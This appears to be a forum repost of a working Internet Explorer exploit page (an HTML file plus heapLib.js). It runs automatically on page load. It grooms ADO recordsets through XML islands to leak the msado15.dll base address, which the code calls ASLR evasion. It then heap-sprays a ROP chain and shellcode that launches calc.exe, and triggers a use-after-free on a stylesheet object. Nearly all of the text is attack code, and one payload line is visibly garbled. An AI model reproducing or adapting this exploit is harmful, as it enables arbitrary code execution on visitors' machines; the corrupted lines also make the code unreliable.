<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC> 

    value2 

</CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC> 

</data> 

</root> 

</XML> 

  

  </body> 

</html>

----------------------------------------------------------------------------------------------

一共2个文件:一个HTML,一个JS。

Exp.Html:

<html xmlns:t = "urn:schemas-microsoft-com:time">
  <head>
  <meta name="License" content="Q Public License;[url]http://en.wikipedia.org/wiki/Q_Public_License[/url]">
    <style>
      .body {
     
      }
      #test {
   
      }
    </style>
    <script src="heapLib.js"></script>
    <script>
    // This code has been released under the Q Public License by Trolltech
    // [url]http://en.wikipedia.org/wiki/Q_Public_License[/url]

var StartTime = new Date();   
var FinalHeapSpraySize = 900;
//var SmallHoleSize = 0x1F0;
var SmallHoleSize = 0x240;
var GlobalRowCounter = 0;
 
var localxmlid1;
var localxmlid2;   
var localxmlid3;   
var localxmlid5; 
var adobase = 0;
var finalspray = '';
var heap = null;
var ExpoitTime = 10;
var CurrentHeapSpraySize = 0;


function Start() {
        FaseOne();
}

 

function FaseOne() {

  localxmlid1 = document.getElementById('xmlid1').recordset;   
  localxmlid2 = document.getElementById('xmlid2').recordset;   
  localxmlid3 = document.getElementById('xmlid3').recordset;   
  localxmlid5 = document.getElementById('xmlid5').recordset;   
 
  localxmlid2.CacheSize = 0x40000358;
 
  localxmlid1.CacheSize = SmallHoleSize;;   //small hole?
  localxmlid1.AddNew(["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"], ["c"]);
  localxmlid5.AddNew(["BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"], ["c"]);
 
 
  var my1field = localxmlid5.Fields.Item(0);
  localxmlid1.MoveFirst();
 
  localxmlid2.AddNew(["BBBB"], ["c"]); 
 
  localxmlid1.Close();
  CollectGarbage();
 
  localxmlid3.MoveFirst();
 
  void(Math.atan2(0xbabe, ('###################### 2 Move First').toString()));
  localxmlid2.MoveFirst();

  void(Math.atan2(0xbabe, ('###################### 5 Move First').toString()));
  localxmlid5.CacheSize = 0x40000008;
  localxmlid5.MoveFirst();
  localxmlid3.AddNew(["MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong"], ["cccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuFINDMEccccc"]);

  var localxmlid4 = document.getElementById('xmlid4').recordset;   

  localxmlid4.AddNew(["bb"], ["c"]);

  localxmlid4.MoveNext(); 
 
 
  var localxmlid6 = document.getElementById('xmlid6').recordset;
  localxmlid6.AddNew(["CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"], ["c"]); 
 
  localxmlid2.MoveFirst();
 
  Math.tan(1);
 
  document.getElementById('textfaseone').innerText = 'Setting up data for ASLR evasion:';
  if(GlobalRowCounter < 0x10120) {
          window.setTimeout(IncreaseRowCounter, 100);
  }
}


function IncreaseRowCounter() {
        //alert('IncreaseRowCounter: ' + GlobalRowCounter)
        if(GlobalRowCounter < 0x10120) {               
          for(i = 0; i < 0x300; i++) {                 
                  GlobalRowCounter++;
      localxmlid2.AddNew(["BBBB"], ["c"]);
      localxmlid2.Delete();
    }
    var percentcomplete = Math.round(GlobalRowCounter /0x10120 * 100);
    document.getElementById('progressfaseone').innerText = percentcomplete + "%";
    window.setTimeout(IncreaseRowCounter, 100);
  }
  else {
          document.getElementById('textfaseonedone').innerText = 'Now searching memory for suitable vtable. Please wait...';
          window.setTimeout(FindADOBase, 100);
  }
}

function FindADOBase() {
        //alert('FindADOBase');
 
         
  var myfield = localxmlid3.Fields.Item(1);

          for(i = 0; i < 0xDF6; i++) {
      localxmlid2.AddNew(["BBBB"], ["c"]);
      localxmlid2.MoveFirst();
      if(myfield.Name != "MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong") {
              break;
      }
    }
    //alert('done first');

  void(Math.atan2(0xbabe, ('###################### Add untill vftable 2').toString()));
 
  var vftable1 = null;
  var vftable2 = null;
 
          for(i = 0; i < 0xAE0; i++) {
                  void(Math.atan2(0xbabe, ('add row: ' + i).toString()));
      localxmlid2.AddNew(["BBBB"], ["c"]);
      localxmlid2.MoveFirst();
      //if(i > 10) {
      //  document.forms[0].myresult.value += i.toString(16) + " : " + escape(myfield.name.substr((2 * i) + 4, 8)) + " : "  + myfield.name.length + "\n";
      //}
      if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uAD68/)) {
              vftable1 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1");
      }     
      if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uD738/)) {
              vftable2 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1");
      } 
      if(vftable1  && vftable2) {
              break;
      }
    }
   //document.forms[0].myresult.value += "\n\nVFTABLES: " + vftable1 + " : " + vftable2 + "\n\n\n";
   //alert(vftable1);
   if((parseInt(vftable1,16) - 0x1AD68) == (parseInt(vftable2,16) - 0xD738)) {           
            adobase = parseInt(vftable1,16) - 0x1AD68;
            document.getElementById('textfoundaddress').innerText = 'Found base address of <censored>.dll: 0x<censored>';// + adobase.toString(16);
            FaseTwo();
   }
   else {
     alert('sadly we failed to read the base address of msado15.dll :( ');       
   }
  
}   

function FaseTwo() {       
        document.getElementById('textfasetwo').innerText = 'Setting up heap for DEP evasion:';
        document.getElementById('progressfasetwo').innerText = '0%';
  heap = new heapLib.ie(0x20000);

     
  var heapspray = unescape("%u2020%u1604%u0102, %u0103%u0104%u0105" + MakeAddre, , , ssString(adobase + 0x117C3) + MakeAddressString(adobase + 0x, 1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123" + MakeAddressString(adobase)  + "%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F" +
                  "%u9090%u9090%u868B%u1108%u0000%u5056%u056A%uA068%u0421%u0516%u185E%u0008%uD0FF%u5058%u0590%u0BBB%u0000%uD0FF%uF88B%u0558%u3B47%u0000%u006A%uFF57%uCCD0" + "%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF" +                                   
                  "%u6163%u636C%u652E%u6578%u0000%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578%u0000%u0000" + "%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF");
                  //"%u6163%u636C%u652D%u6578%u0000
                 //%u3A63%u775C%u6E69%u6F64%u7377%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578
                 //c:\windows\system32\calc.exe
                 //%63%61%6C%63%2E%65%78%65
                 //%63%3A%5C%77%69%6E%64%6F%77%73%5C%73%79%73%74%65%6D%33%32%5C%63%61%6C%63%2E%65%78%65   
                 
  //var heapspray = unescape("%u2020%u1604%u0102%u0103%u0104%u0105" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123%u0124%u0125%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F%u0170%u0171%u0172%u0173%u0174%u0175%u0176%u0177%u0178%u0179%u017A%u017B%u017C%u017D%u017E%u017F%u0180%u0181%u0182%u0183%u0184%u0185%u0186%u0187%u0188%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF%u01C0%u01C1%u01C2%u01C3%u01C4%u01C5%u01C6%u01C7%u01C8%u01C9%u01CA%u01CB%u01CC%u01CD%u01CE%u01CF%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF");

  while(heapspray.length < 0x200) heapspray += unescape("%u4444");

  var heapblock = heapspray;
  while(heapblock.length < 0x40000) heapblock += heapblock;
  finalspray = heapblock.substring(2, 0x40000 - 0x21);

  //alert('Base address of ado15.dll ' + adobase.toString(16));
  if(CurrentHeapSpraySize < 900) {
          window.setTimeout(SprayHeap, 100);
  }
  else {
          RunExploit();
  }
}

function SprayHeap() {
  if(CurrentHeapSpraySize < FinalHeapSpraySize - 1) {
    for(var i = 0; i < 90; i++) {
      heap.alloc(finalspray);
      CurrentHeapSpraySize++;
    }
    var percentcomplete = Math.round(CurrentHeapSpraySize /FinalHeapSpraySize * 100);
    document.getElementById('progressfasetwo').innerText = percentcomplete + "%";   
    window.setTimeout(SprayHeap, 100);
  } 
        else {
                document.getElementById('textfasetwodone').innerText = "Ready to start calc.exe in: ";   
                window.setTimeout(RunExploitTimer, 100);
        }
       
}

function RunExploitTimer() {
        if(ExpoitTime > 0) {
                document.getElementById('countexploitrun').innerText = ExpoitTime;
                window.setTimeout(RunExploitTimer, 500);
                ExpoitTime--;
        }
        else {
                document.getElementById('countexploitrun').innerText = 0;       
                var EndTime = new Date();
          var TotalRun = Math.round((EndTime.getTime() - StartTime.getTime()) / 1000);
          document.getElementById('totalruntime').innerText = "Total exploitation time: " + TotalRun + " seconds";        
                window.setTimeout(RunExploit, 100);
        }
}
   
function RunExploit() {
 
  var elms = new Array();
  for(i =0; i < 100; i++) {
          elms.push(document.createElement('div'));
  }

  owningObj = document.styleSheets[0].owningElement; 

  myimports = document.styleSheets[0].imports;

  document.appendChild(owningObj);
  document.removeChild(owningObj);

  owningObj.outerHTML = 'a';

  Math.atan2(0xbabe, "Collect");
  CollectGarbage();

  Math.atan2(0xbabe, "spray");
  for(i = 0; i < 100; i++) {
          elms[i].className = unescape("%u4140%u4141%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u2020%u1604%u2020%u1604%u4159%u415a%u415b");
  }  

  Result = owningObj.insertAdjacentElement(myimports,'a');
 
       
}   

function MakeAddressString(addrint) {
        //First, turn into hex:
        var addstr = addrint.toString(16);
        //Split and swap
        addstr = addstr.replace(/(\w\w\w\w)(\w\w\w\w)/,"%u$2%u$1");
        return addstr;
}
   
    </script>

  </head>
  <body onLoad="window.setTimeout(Start,100);" id="bodyid">
  <div>
          <h2 id="textfaseone"></h2>
         
    <h2 id="progressfaseone"></h2>
   
    <h2 id="textfaseonedone"></h2>
   
    <h2 id="textfoundaddress"></h2>
   
    <h2 id="textfasetwo"></h2>
   
    <h2 id="progressfasetwo"></h2>
   
    <h2 id="textfasetwodone"></h2>
   
    <h2 id="countexploitrun"></h2>
   
    <h2 id="totalruntime"></h2>
  </div>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid1">
<Devices>
<Device>
<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid2">
<Devices>
<Device>
<BBBB />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid3">
<root>
<data>
        <SmallData>
  </SmallData>
<MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>
        value1
</MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>
</data>
</root>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid4">
<Devices>
<Device>
<bb />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid5">
<Devices>
<Device>
